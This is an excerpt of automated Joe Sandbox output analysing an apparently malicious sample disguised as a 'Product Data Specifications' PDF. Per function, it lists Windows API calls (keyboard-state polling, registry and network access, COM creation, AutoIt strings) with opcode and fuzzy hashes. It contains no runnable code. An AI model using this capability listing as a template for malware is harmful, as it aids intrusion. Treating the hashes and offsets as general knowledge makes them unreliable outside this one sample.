                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                              • String ID:
                              • API String ID: 3218148540-0
                              • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                              • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                              • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                              • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                              • String ID:
                              • API String ID: 136442275-0
                              • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                              • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                              • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                              • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                              APIs
                              • _wcsncpy.LIBCMT ref: 00467490
                              • _wcsncpy.LIBCMT ref: 004674BC
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • _wcstok.LIBCMT ref: 004674FF
                                • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                              • _wcstok.LIBCMT ref: 004675B2
                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                              • _wcslen.LIBCMT ref: 00467793
                              • _wcscpy.LIBCMT ref: 00467641
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • _wcslen.LIBCMT ref: 004677BD
                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                              • String ID: X
                              • API String ID: 3104067586-3081909835
                              • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                              • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                              • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                              • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                              APIs
                              • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                              • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                              • _wcslen.LIBCMT ref: 004610A3
                              • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                              • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                              • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                              • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                              • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                              • GetWindowRect.USER32(?,?), ref: 00461248
                                • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                              • String ID: ThumbnailClass
                              • API String ID: 4136854206-1241985126
                              • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                              • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                              • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                              • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                              APIs
                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                              • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                              • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                              • GetClientRect.USER32(?,?), ref: 00471A1A
                              • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                              • DestroyIcon.USER32(?), ref: 00471AF4
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                              • String ID: 2
                              • API String ID: 1331449709-450215437
                              • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                              • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                              • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                              • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                              • __swprintf.LIBCMT ref: 00460915
                              • __swprintf.LIBCMT ref: 0046092D
                              • _wprintf.LIBCMT ref: 004609E1
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                              • API String ID: 3054410614-2561132961
                              • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                              • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                              • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                              • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                              APIs
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                              • CLSIDFromString.OLE32(?,?), ref: 004587B3
                              • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                              • RegCloseKey.ADVAPI32(?), ref: 004587C5
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                              • API String ID: 600699880-22481851
                              • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                              • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                              • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                              • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: DestroyWindow
                              • String ID: static
                              • API String ID: 3375834691-2160076837
                              • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                              • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                              • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                              • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                              • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorMode$DriveType
                              • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                              • API String ID: 2907320926-3566645568
                              • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                              • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                              • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                              • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                              APIs
                                • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                              • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                              • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                              • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                              • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                              • DeleteObject.GDI32(00430000), ref: 00470A04
                              • DestroyIcon.USER32(005C003A), ref: 00470A1C
                              • DeleteObject.GDI32(351438E6), ref: 00470A34
                              • DestroyWindow.USER32(005C006C), ref: 00470A4C
                              • DestroyIcon.USER32(?), ref: 00470A73
                              • DestroyIcon.USER32(?), ref: 00470A81
                              • KillTimer.USER32(00000000,00000000), ref: 00470B00
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                              • String ID:
                              • API String ID: 1237572874-0
                              • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                              • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                              • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                              • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                              APIs
                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                              • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                              • VariantInit.OLEAUT32(?), ref: 004793E1
                              • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                              • VariantCopy.OLEAUT32(?,?), ref: 00479461
                              • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                              • VariantClear.OLEAUT32(?), ref: 00479489
                              • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                              • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                              • VariantClear.OLEAUT32(?), ref: 004794CA
                              • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                              • String ID:
                              • API String ID: 2706829360-0
                              • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                              • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                              • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                              • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                              APIs
                              • GetKeyboardState.USER32(?), ref: 0044480E
                              • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                              • GetKeyState.USER32(000000A0), ref: 004448AA
                              • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                              • GetKeyState.USER32(000000A1), ref: 004448D9
                              • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                              • GetKeyState.USER32(00000011), ref: 00444903
                              • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                              • GetKeyState.USER32(00000012), ref: 0044492D
                              • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                              • GetKeyState.USER32(0000005B), ref: 00444958
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: State$Async$Keyboard
                              • String ID:
                              • API String ID: 541375521-0
                              • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                              • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                              • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                              • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: InitVariant$_malloc_wcscpy_wcslen
                              • String ID:
                              • API String ID: 3413494760-0
                              • Opcode ID: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                              • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                              • Opcode Fuzzy Hash: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                              • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: AddressProc_free_malloc$_strcat_strlen
                              • String ID: AU3_FreeVar
                              • API String ID: 2634073740-771828931
                              • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                              • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                              • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                              • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                              APIs
                              • CoInitialize.OLE32 ref: 0046C63A
                              • CoUninitialize.OLE32 ref: 0046C645
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                              • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                              • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                              • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                              • IIDFromString.OLE32(?,?), ref: 0046C705
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                              • API String ID: 2294789929-1287834457
                              • Opcode ID: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                              • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
